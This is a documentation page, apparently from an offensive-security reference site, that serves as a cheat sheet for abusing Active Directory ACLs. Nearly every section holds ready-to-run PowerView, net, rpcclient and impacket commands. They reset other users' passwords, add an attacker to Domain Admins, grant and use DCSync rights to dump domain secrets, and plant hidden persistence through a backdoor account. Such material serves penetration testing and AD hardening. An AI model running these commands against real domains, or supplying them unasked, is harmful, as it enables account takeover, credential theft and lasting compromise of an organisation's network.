> ## Documentation Index
> Fetch the complete documentation index at: https://docs.bytejmp.com/llms.txt
> Use this file to discover all available pages before exploring further.

# ACL Abuse

> Active Directory ACL abuse: GenericAll, WriteDacl, ForceChangePassword, and DACL persistence.

## Overview

AD objects have DACLs (Discretionary Access Control Lists) controlling access. Misconfigured ACLs grant powerful privileges to low-privilege users.

***

## Dangerous ACEs

| ACE                 | Allows                                   |
| ------------------- | ---------------------------------------- |
| GenericAll          | Full control over object                 |
| GenericWrite        | Write any property                       |
| WriteDacl           | Modify DACL (grant yourself permissions) |
| WriteOwner          | Change object owner                      |
| ForceChangePassword | Reset user password                      |
| AddMember           | Add member to group                      |
| AllExtendedRights   | Change password, read LAPS, etc.         |

***

## Find Dangerous ACLs

### PowerView

```powershell theme={"dark"}
Find-InterestingDomainAcl -ResolveGUIDs
Get-ObjectAcl -SamAccountName USER -ResolveGUIDs
Get-ObjectAcl -SamAccountName "Domain Admins" -ResolveGUIDs | ? {$_.ActiveDirectoryRights -match "GenericAll|WriteDacl|WriteOwner"}
```

### BloodHound

Edges: GenericAll, WriteDacl, WriteOwner, ForceChangePassword, AddMember.

***

## Exploit — GenericAll on User

### Reset Password

```powershell theme={"dark"}
Set-DomainUserPassword -Identity targetuser -AccountPassword (ConvertTo-SecureString 'NewPass123!' -AsPlainText -Force)
```

```bash theme={"dark"}
net rpc password targetuser 'NewPass123!' -U 'DOMAIN/attacker%password' -S DC_IP
```

### Set SPN (Targeted Kerberoasting)

```powershell theme={"dark"}
Set-DomainObject -Identity targetuser -SET @{serviceprincipalname='fake/spn'}
```

***

## Exploit — GenericAll on Group

```powershell theme={"dark"}
Add-DomainGroupMember -Identity "Domain Admins" -Members attacker
net group "Domain Admins" attacker /add /domain
```

***

## Exploit — GenericAll on Computer

```powershell theme={"dark"}
# RBCD
Set-ADComputer TARGET$ -PrincipalsAllowedToDelegateToAccount EVIL$
```

***

## Exploit — WriteDacl

Grant yourself DCSync rights:

```powershell theme={"dark"}
Add-DomainObjectAcl -TargetIdentity "DC=domain,DC=local" -PrincipalIdentity attacker -Rights DCSync
```

Then DCSync:

```bash theme={"dark"}
impacket-secretsdump DOMAIN/attacker:password@DC_IP
```

***

## Exploit — WriteOwner

```powershell theme={"dark"}
Set-DomainObjectOwner -Identity "Domain Admins" -OwnerIdentity attacker
Add-DomainObjectAcl -TargetIdentity "Domain Admins" -PrincipalIdentity attacker -Rights All
Add-DomainGroupMember -Identity "Domain Admins" -Members attacker
```

***

## Exploit — ForceChangePassword

```powershell theme={"dark"}
Set-DomainUserPassword -Identity targetuser -AccountPassword (ConvertTo-SecureString 'NewPass!' -AsPlainText -Force)
```

```bash theme={"dark"}
rpcclient -U 'attacker%password' DC_IP -c "setuserinfo2 targetuser 23 'NewPass!'"
```

***

## ACL Persistence

### Add Hidden DCSync Rights

```powershell theme={"dark"}
Add-DomainObjectAcl -TargetIdentity "DC=domain,DC=local" -PrincipalIdentity backdoor_user -Rights DCSync
```

### Add GenericAll on Domain Admins

```powershell theme={"dark"}
Add-DomainObjectAcl -TargetIdentity "Domain Admins" -PrincipalIdentity backdoor_user -Rights All
```

***

## Quick Reference

| ACE                 | Exploit                               |
| ------------------- | ------------------------------------- |
| GenericAll (user)   | Reset password or targeted kerberoast |
| GenericAll (group)  | Add yourself to group                 |
| WriteDacl           | Grant DCSync rights                   |
| WriteOwner          | Take ownership → full control         |
| ForceChangePassword | Reset target password                 |
